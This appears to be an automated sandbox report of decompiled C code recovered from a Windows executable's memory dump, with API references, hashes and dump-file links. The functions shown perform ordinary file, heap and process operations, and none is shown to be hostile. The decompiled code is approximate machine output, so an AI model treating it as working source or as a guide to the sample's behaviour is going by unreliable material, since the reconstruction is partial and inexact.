    				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
    				return _t89;
    			}












    0x0083136e
    0x0083136e
    0x00831373
    0x00831378
    0x0083137b
    0x0083137d
    0x00831380
    0x00831387
    0x00831393
    0x00831396
    0x008313a1
    0x008313a5
    0x008313b0
    0x008313b6
    0x008313bc
    0x008313c7
    0x008313cf
    0x008313d3
    0x008313d6
    0x008313dc
    0x008313e2
    0x008313e4
    0x00831409
    0x008313e6
    0x008313eb
    0x008313f1
    0x008313f4
    0x008313fa
    0x00831405
    0x008313fc
    0x008313fe
    0x008313fe
    0x008313fa
    0x0083140c
    0x00831418
    0x0083141f
    0x00831426
    0x0083142f
    0x0083143a
    0x00831444
    0x0083144a
    0x00831450
    0x00831456
    0x0083145c
    0x00831462
    0x00831468
    0x0083146f
    0x00831475
    0x0083147b
    0x00831481
    0x00831487
    0x0083148d
    0x0083149c
    0x008314ab
    0x008314b6
    0x008314be
    0x008314c4
    0x008314ca
    0x008314d0
    0x008314d6
    0x008314dc
    0x008314e2
    0x008314eb
    0x008314f1
    0x008314f7
    0x008314ff
    0x00831509

    APIs
    • __EH_prolog.LIBCMT ref: 00831373
      • Part of subcall function 00835FC6: __EH_prolog.LIBCMT ref: 00835FCB
      • Part of subcall function 0083C567: __EH_prolog.LIBCMT ref: 0083C56C
      • Part of subcall function 0083C567: new.LIBCMT ref: 0083C5AF
      • Part of subcall function 0083C567: new.LIBCMT ref: 0083C5D3
    • new.LIBCMT ref: 008313EB
      • Part of subcall function 0083ADBF: __EH_prolog.LIBCMT ref: 0083ADC4
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: ce965293da51ae94a1948573f681e719a17f1c4f47a227a709f8c87c4228b847
    • Instruction ID: 6a5ee24f9e0134628aecb976060a2dbfccf0b3acc53e7b3da19c853c12ea933b
    • Opcode Fuzzy Hash: ce965293da51ae94a1948573f681e719a17f1c4f47a227a709f8c87c4228b847
    • Instruction Fuzzy Hash: 524124B0805B449ED724CF7984859E6FBE5FF18700F504A6ED5EEC3282CB326554CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E008395C0(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
    				long _v0;
    				signed char _t34;
    				signed int _t36;
    				void* _t37;
    				signed char _t46;
    				struct _SECURITY_ATTRIBUTES* _t47;
    				long _t56;
    				void* _t59;
    				long _t63;
    
    				E0084D9C0();
    				_t46 = _a4108;
    				_t34 = _t46 >> 0x00000001 & 0x00000001;
    				_t59 = __ecx;
    				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x1d)) != 0) {
    					_t63 = 1;
    					__eflags = 1;
    				} else {
    					_t63 = 0;
    				}
    				 *(_t59 + 0x18) = _t46;
    				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
    				_t36 =  *(E0083B9C4(_t34, _a4104)) & 0x0000ffff;
    				if(_t36 == 0x2e || _t36 == 0x20) {
    					if((_t46 & 0x00000020) != 0) {
    						goto L8;
    					} else {
    						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
    						_t47 = 0;
    						_t56 = _v0;
    					}
    				} else {
    					L8:
    					_t56 = _v0;
    					_t47 = 0;
    					__eflags = 0;
    					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
    					 *(_t59 + 4) = _t37;
    				}
    				if( *(_t59 + 4) == 0xffffffff && E0083B3C9(_a4104,  &_a4, 0x800) != 0) {
    					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
    				}
    				 *((char*)(_t59 + 0x12)) = 1;
    				 *(_t59 + 0xc) = _t47;
    				 *(_t59 + 0x10) = _t47;
    				return E0083FAE7(_t59 + 0x1e, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
    			}












    0x008395c5
    0x008395cb
    0x008395d8
    0x008395da
    0x008395e0
    0x008395ee
    0x008395ee
    0x008395e8
    0x008395e8
    0x008395e8
    0x008395f8
    0x0083960d
    0x00839616
    0x0083961c
    0x00839626
    0x00000000
    0x00839628
    0x00839628
    0x0083962c
    0x0083962e
    0x0083962e
    0x00839634
    0x00839634
    0x00839634
    0x00839638
    0x00839638
    0x00839648
    0x0083964e
    0x0083964e
    0x00839655
    0x00839683
    0x00839683
    0x00839695
    0x0083969a
    0x0083969d
    0x008396b6

    APIs
    • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00839C97,?,?,0083779F), ref: 00839648
    • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00839C97,?,?,0083779F), ref: 0083967D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 22f59ec6f43ad645882dcfd7cbd179f6ffe316c5bb67640c89718dfedceccd86
    • Instruction ID: 5731b8c169fc46f9cddea59d56c57456488529baddccc7cf69d2e038fdc63147
    • Opcode Fuzzy Hash: 22f59ec6f43ad645882dcfd7cbd179f6ffe316c5bb67640c89718dfedceccd86
    • Instruction Fuzzy Hash: C921F6B1505748AFD7308F18C846BA77BE8FB95764F004A2DF5E5C21D1D3B4EC498AA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00839B22(void* __ecx, void* __esi, signed char _a4, signed int* _a8, signed int* _a12) {
    				void* _v8;
    				void* _v16;
    				void* _v24;
    				signed char _v25;
    				int _t34;
    				signed char _t49;
    				signed int* _t51;
    				signed char _t57;
    				void* _t58;
    				void* _t59;
    				signed int* _t60;
    				signed int* _t62;
    
    				_t59 = __esi;
    				_t58 = __ecx;
    				if( *(__ecx + 0x18) != 0x100 && ( *(__ecx + 0x18) & 0x00000002) == 0) {
    					FlushFileBuffers( *(__ecx + 4));
    				}
    				_t51 = _a4;
    				_t49 = 1;
    				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
    					_t57 = 0;
    				} else {
    					_t57 = 1;
    				}
    				_push(_t59);
    				_t60 = _a8;
    				_v25 = _t57;
    				if(_t60 == 0) {
    					L9:
    					_a4 = 0;
    				} else {
    					_a4 = _t49;
    					if(( *_t60 | _t60[1]) == 0) {
    						goto L9;
    					}
    				}
    				_t62 = _a12;
    				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
    					_t49 = 0;
    				}
    				if(_t57 != 0) {
    					E00840857(_t51, _t57,  &_v24);
    				}
    				if(_a4 != 0) {
    					E00840857(_t60, _t57,  &_v8);
    				}
    				if(_t49 != 0) {
    					E00840857(_t62, _t57,  &_v16);
    				}
    				asm("sbb eax, eax");
    				asm("sbb eax, eax");
    				asm("sbb eax, eax");
    				_t34 = SetFileTime( *(_t58 + 4),  ~(_a4 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
    				return _t34;
    			}















    0x00839b22
    0x00839b28
    0x00839b31
    0x00839b3c
    0x00839b3c
    0x00839b42
    0x00839b48
    0x00839b4b
    0x00839b58
    0x00839b54
    0x00839b54
    0x00839b54
    0x00839b5a
    0x00839b5b
    0x00839b5f
    0x00839b65
    0x00839b72
    0x00839b72
    0x00839b67
    0x00839b6c
    0x00839b70
    0x00000000
    0x00000000
    0x00839b70
    0x00839b77
    0x00839b7d
    0x00839b87
    0x00839b87
    0x00839b8b
    0x00839b92
    0x00839b92
    0x00839b9c
    0x00839ba5
    0x00839ba5
    0x00839bad
    0x00839bb6
    0x00839bb6
    0x00839bc6
    0x00839bd4
    0x00839be4
    0x00839bec
    0x00839bf8

    APIs
    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,0083747F,?,?,?), ref: 00839B3C
    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00839BEC
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$BuffersFlushTime
    • String ID:
    • API String ID: 1392018926-0
    • Opcode ID: 3231ba986e3a0b7a28cb5dcfae2b47564f2d99f1c7bff42ba9425a2002ef5f2a
    • Instruction ID: d354883fc700a5ea92b357ccec940de6d4cdadfcf4d8d58e5c955d8416e20fc2
    • Opcode Fuzzy Hash: 3231ba986e3a0b7a28cb5dcfae2b47564f2d99f1c7bff42ba9425a2002ef5f2a
    • Instruction Fuzzy Hash: C521E1311482A5ABC710DE28E881EAAFBD4FF95314F04495CF8D1C3141C365ED08DBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E008599EB(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				struct HINSTANCE__* _t13;
    				signed int* _t20;
    				signed int _t27;
    				signed int _t28;
    				signed int _t29;
    				signed int _t33;
    				intOrPtr* _t34;
    
    				_t20 = 0x8907b8 + _a4 * 4;
    				_t27 =  *0x86d668; // 0x14325215
    				_t29 = _t28 | 0xffffffff;
    				_t33 = _t27 ^  *_t20;
    				asm("ror esi, cl");
    				if(_t33 == _t29) {
    					L14:
    					return 0;
    				}
    				if(_t33 == 0) {
    					_t34 = _a12;
    					if(_t34 == _a16) {
    						L7:
    						_t13 = 0;
    						L8:
    						if(_t13 == 0) {
    							L13:
    							_push(0x20);
    							asm("ror edi, cl");
    							 *_t20 = _t29 ^ _t27;
    							goto L14;
    						}
    						_t33 = GetProcAddress(_t13, _a8);
    						if(_t33 == 0) {
    							_t27 =  *0x86d668; // 0x14325215
    							goto L13;
    						}
    						 *_t20 = E00852739(_t33);
    						goto L2;
    					} else {
    						goto L4;
    					}
    					while(1) {
    						L4:
    						_t13 = E00859A87( *_t34); // executed
    						if(_t13 != 0) {
    							break;
    						}
    						_t34 = _t34 + 4;
    						if(_t34 != _a16) {
    							continue;
    						}
    						_t27 =  *0x86d668; // 0x14325215
    						goto L7;
    					}
    					_t27 =  *0x86d668; // 0x14325215
    					goto L8;
    				}
    				L2:
    				return _t33;
    			}










    0x008599f6
    0x008599ff
    0x00859a05
    0x00859a0f
    0x00859a11
    0x00859a15
    0x00859a80
    0x00000000
    0x00859a80
    0x00859a19
    0x00859a1f
    0x00859a25
    0x00859a41
    0x00859a41
    0x00859a43
    0x00859a45
    0x00859a70
    0x00859a72
    0x00859a7a
    0x00859a7e
    0x00000000
    0x00859a7e
    0x00859a51
    0x00859a55
    0x00859a6a
    0x00000000
    0x00859a6a
    0x00859a5e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00859a27
    0x00859a27
    0x00859a29
    0x00859a31
    0x00000000
    0x00000000
    0x00859a33
    0x00859a39
    0x00000000
    0x00000000
    0x00859a3b
    0x00000000
    0x00859a3b
    0x00859a62
    0x00000000
    0x00859a62
    0x00859a1b
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 00859A4B
    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00859A58
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc__crt_fast_encode_pointer
    • String ID:
    • API String ID: 2279764990-0
    • Opcode ID: 4787968acca53e59026cfb032a20245697265840d430daaf8ddc306ac9254c7f
    • Instruction ID: 8ba36a62110d91116da325fe6fa3e7b1dfcd1f95e8d483c57c9f126477626d9a
    • Opcode Fuzzy Hash: 4787968acca53e59026cfb032a20245697265840d430daaf8ddc306ac9254c7f
    • Instruction Fuzzy Hash: F111E737A00631DB9F23DE28EC40D5A7395FB813617174220ED56EB294E730EC45C6E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00839BFB() {
    				long _v4;
    				void* __ecx;
    				void* __ebp;
    				long _t12;
    				signed int _t14;
    				signed int _t21;
    				signed int _t22;
    				void* _t23;
    				long _t32;
    				void* _t34;
    
    				_t34 = _t23;
    				_t22 = _t21 | 0xffffffff;
    				if( *(_t34 + 4) != _t22) {
    					L3:
    					_v4 = _v4 & 0x00000000;
    					_t12 = SetFilePointer( *(_t34 + 4), 0,  &_v4, 1); // executed
    					_t32 = _t12;
    					if(_t32 != _t22 || GetLastError() == 0) {
    						L7:
    						asm("cdq");
    						_t14 = 0 + _t32;
    						asm("adc edx, 0x0");
    						goto L8;
    					} else {
    						if( *((char*)(_t34 + 0x14)) == 0) {
    							_t14 = _t22;
    							L8:
    							return _t14;
    						}
    						E00836EF7(0x8700e0, 0x8700e0, _t34 + 0x1e);
    						goto L7;
    					}
    				}
    				if( *((char*)(_t34 + 0x14)) == 0) {
    					return _t22;
    				}
    				E00836EF7(0x8700e0, 0x8700e0, _t34 + 0x1e);
    				goto L3;
    			}













    0x00839bff
    0x00839c01
    0x00839c0c
    0x00839c1f
    0x00839c1f
    0x00839c31
    0x00839c37
    0x00839c3b
    0x00839c58
    0x00839c5e
    0x00839c63
    0x00839c65
    0x00000000
    0x00839c47
    0x00839c4b
    0x00839c74
    0x00839c68
    0x00000000
    0x00839c68
    0x00839c53
    0x00000000
    0x00839c53
    0x00839c3b
    0x00839c12
    0x00000000
    0x00839c70
    0x00839c1a
    0x00000000

    APIs
    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00839C31
    • GetLastError.KERNEL32 ref: 00839C3D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: afbd4dfd083aec1f4cabd334901a0c37bf07db1777bdc9ac62780b9b8f3506c0
    • Instruction ID: da4c6b7be2a364030cbb3e92f1e91d76474cd27ae2bdb3c2fd99db035c4d8f74
    • Opcode Fuzzy Hash: afbd4dfd083aec1f4cabd334901a0c37bf07db1777bdc9ac62780b9b8f3506c0
    • Instruction Fuzzy Hash: 8E0196703006446BDB349E29DC84766B7D9FBC4314F15853EF192C7680DAB4DC0DC651
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E008399A7(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
    				void* __ebp;
    				long _t14;
    				void* _t17;
    				intOrPtr* _t19;
    				long _t21;
    				intOrPtr* _t22;
    				void* _t23;
    				long _t25;
    				long _t28;
    				long _t31;
    
    				_t19 = __ecx;
    				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
    					L13:
    					return 1;
    				}
    				_t28 = _a4;
    				_t25 = _a8;
    				_t31 = _t25;
    				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
    					_t21 = _a12;
    				} else {
    					_t21 = _a12;
    					if(_t21 != 0) {
    						_t22 = _t19;
    						if(_t21 != 1) {
    							_t17 = E00839779(_t22, _t23);
    						} else {
    							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
    						}
    						_t28 = _t28 + _t17;
    						asm("adc edi, edx");
    						_t21 = 0;
    					}
    				}
    				_a12 = _t25;
    				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
    				if(_t14 != 0xffffffff || GetLastError() == 0) {
    					goto L13;
    				} else {
    					return 0;
    				}
    			}













    0x008399ab
    0x008399b1
    0x00839a16
    0x00000000
    0x00839a16
    0x008399b4
    0x008399b8
    0x008399bb
    0x008399bd
    0x008399e7
    0x008399c5
    0x008399c5
    0x008399ca
    0x008399cf
    0x008399d1
    0x008399da
    0x008399d3
    0x008399d5
    0x008399d5
    0x008399df
    0x008399e1
    0x008399e3
    0x008399e3
    0x008399ca
    0x008399ec
    0x008399fb
    0x00839a06
    0x00000000
    0x00839a12
    0x00000000
    0x00839a12

    APIs
    • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 008399FB
    • GetLastError.KERNEL32 ref: 00839A08
      • Part of subcall function 00839779: __EH_prolog.LIBCMT ref: 0083977E
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFileH_prologLastPointer
    • String ID:
    • API String ID: 4236474358-0
    • Opcode ID: 433240102f9c48289c913ddd40f18173ef469bc0cc6d53ad57e2f7c69ca62ccc
    • Instruction ID: a0803236d5a4b9e4f0bf43a813d19eb825d74e232bc90cf7e1e1b7886ebc51db
    • Opcode Fuzzy Hash: 433240102f9c48289c913ddd40f18173ef469bc0cc6d53ad57e2f7c69ca62ccc
    • Instruction Fuzzy Hash: 3F01F1326012149B8F189E2D8C84ABA3B59FFC1320B04422EECA6DB291D6F0DC11C7E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00857BEE(void* __ecx, void* __edx, void* _a4, long _a8) {
    				void* __esi;
    				void* _t4;
    				long _t7;
    				void* _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    
    				_t13 = __edx;
    				_t10 = __ecx;
    				_t14 = _a4;
    				if(_t14 != 0) {
    					_t16 = _a8;
    					__eflags = _t16;
    					if(_t16 != 0) {
    						__eflags = _t16 - 0xffffffe0;
    						if(_t16 <= 0xffffffe0) {
    							while(1) {
    								_t4 = HeapReAlloc( *0x890874, 0, _t14, _t16);
    								__eflags = _t4;
    								if(_t4 != 0) {
    									break;
    								}
    								__eflags = E0085797C();
    								if(__eflags == 0) {
    									goto L5;
    								}
    								_t7 = E008567A8(_t10, _t13, _t16, __eflags, _t16);
    								_pop(_t10);
    								__eflags = _t7;
    								if(_t7 == 0) {
    									goto L5;
    								}
    							}
    							L7:
    							return _t4;
    						}
    						L5:
    						 *((intOrPtr*)(E00857F42())) = 0xc;
    						L6:
    						_t4 = 0;
    						__eflags = 0;
    						goto L7;
    					}
    					E00857AC6(_t14);
    					goto L6;
    				}
    				_t9 = E00857B00(__ecx, _a8); // executed
    				return _t9;
    			}










    0x00857bee
    0x00857bee
    0x00857bf4
    0x00857bf9
    0x00857c07
    0x00857c0a
    0x00857c0c
    0x00857c17
    0x00857c1a
    0x00857c41
    0x00857c4b
    0x00857c51
    0x00857c53
    0x00000000
    0x00000000
    0x00857c32
    0x00857c34
    0x00000000
    0x00000000
    0x00857c37
    0x00857c3c
    0x00857c3d
    0x00857c3f
    0x00000000
    0x00000000
    0x00857c3f
    0x00857c29
    0x00000000
    0x00857c29
    0x00857c1c
    0x00857c21
    0x00857c27
    0x00857c27
    0x00857c27
    0x00000000
    0x00857c27
    0x00857c0f
    0x00000000
    0x00857c14
    0x00857bfe
    0x00000000

    APIs
    • _free.LIBCMT ref: 00857C0F
      • Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32
    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,008700E0,0083CB6A,?,?,?,?,?,?), ref: 00857C4B
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Heap$AllocAllocate_free
    • String ID:
    • API String ID: 2447670028-0
    • Opcode ID: 52573f66cff4bae107d0a33c78596a5fdb909b65ae3a0f6c88e45c0c202ea217
    • Instruction ID: e22270ad86ac8eb49ca4b7b8a4a76dd3389a50ca258dfa8521c79522bd1bad2a
    • Opcode Fuzzy Hash: 52573f66cff4bae107d0a33c78596a5fdb909b65ae3a0f6c88e45c0c202ea217
    • Instruction Fuzzy Hash: 21F062316081156E8B222A29BC01E6F2B58FF917B3B15C526FC54EA192EB20CC4995A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084058E(void* __ecx) {
    				long _v8;
    				long _v12;
    				int _t8;
    				void* _t14;
    				signed int _t15;
    				signed int _t17;
    
    				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
    				if(_t8 == 0) {
    					return _t8 + 1;
    				}
    				_t14 = 0;
    				_t17 = _v8;
    				_t15 = 1;
    				do {
    					if((_t17 & _t15) != 0) {
    						_t14 = _t14 + 1;
    					}
    					_t15 = _t15 + _t15;
    				} while (_t15 != 0);
    				if(_t14 >= 1) {
    					return _t14;
    				}
    				return 1;
    			}









    0x008405a2
    0x008405aa
    0x00000000
    0x008405ac
    0x008405b1
    0x008405b5
    0x008405b8
    0x008405ba
    0x008405bc
    0x008405be
    0x008405be
    0x008405bf
    0x008405bf
    0x008405c6
    0x00000000
    0x008405c8
    0x008405cd

    APIs
    • GetCurrentProcess.KERNEL32(?,?), ref: 0084059B
    • GetProcessAffinityMask.KERNEL32(00000000), ref: 008405A2
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$AffinityCurrentMask
    • String ID:
    • API String ID: 1231390398-0
    • Opcode ID: 316408df0f1be98a25e3c9470c3427cf1295be0871004984482bb3b616154822
    • Instruction ID: f267446726376f5323b52d277a9850fcabed634f86602e89abb241254d4057b5
    • Opcode Fuzzy Hash: 316408df0f1be98a25e3c9470c3427cf1295be0871004984482bb3b616154822
    • Instruction Fuzzy Hash: B9E09232A0560DAB4F188AB49C048BB77AEFA1431572241B9EA06E3200F934ED014FA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0083A1D3(WCHAR* _a4, long _a8) {
    				short _v4100;
    				int _t12;
    				signed int _t18;
    				signed int _t19;
    
    				E0084D9C0();
    				_push(_t18);
    				_t12 = SetFileAttributesW(_a4, _a8); // executed
    				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
    				if(_t19 == 0 && E0083B3C9(_a4,  &_v4100, 0x800) != 0) {
    					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
    				}
    				return _t19;
    			}







    0x0083a1db
    0x0083a1e0
    0x0083a1e7
    0x0083a1ef
    0x0083a1f4
    0x0083a220
    0x0083a220
    0x0083a229

    APIs
    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A1E7
    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A218
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AttributesFile
    • String ID:
    • API String ID: 3188754299-0
    • Opcode ID: 054e2b4cfa27b06ec8884bb856372f97cefc9fd007cfa05e36bfac51920c7daf
    • Instruction ID: 59e0eb479f93e0e0af2be3fb2f4088b78dcbbda3d3dc6f4c834e633b748ad354
    • Opcode Fuzzy Hash: 054e2b4cfa27b06ec8884bb856372f97cefc9fd007cfa05e36bfac51920c7daf
    • Instruction Fuzzy Hash: 84F0303155021D6BDF025F64EC41FEA7BACFF08781F448051BD88D6160DB729E99EA91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemText_swprintf
    • String ID:
    • API String ID: 3011073432-0
    • Opcode ID: 9db4a47dbe7e78e2ba4971801cdb49f3115947e44123a7a18e9d9b03b19d1398
    • Instruction ID: dfd4378953fd0a42f64c5eaf03f0b89d1d734bdddd71697ffa39d5e219936067
    • Opcode Fuzzy Hash: 9db4a47dbe7e78e2ba4971801cdb49f3115947e44123a7a18e9d9b03b19d1398
    • Instruction Fuzzy Hash: 7FF0EC7290434C3AE711AB649C07F993B5CF705741F044595F605D60A1D5726A618BA3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00839EBC(WCHAR* _a4) {
    				short _v4100;
    				int _t10;
    				signed int _t16;
    				signed int _t17;
    
    				E0084D9C0();
    				_push(_t16);
    				_t10 = DeleteFileW(_a4); // executed
    				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
    				if(_t17 == 0 && E0083B3C9(_a4,  &_v4100, 0x800) != 0) {
    					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
    				}
    				return _t17;
    			}







    0x00839ec4
    0x00839ec9
    0x00839ecd
    0x00839ed5
    0x00839eda
    0x00839f03
    0x00839f03
    0x00839f0c

    APIs
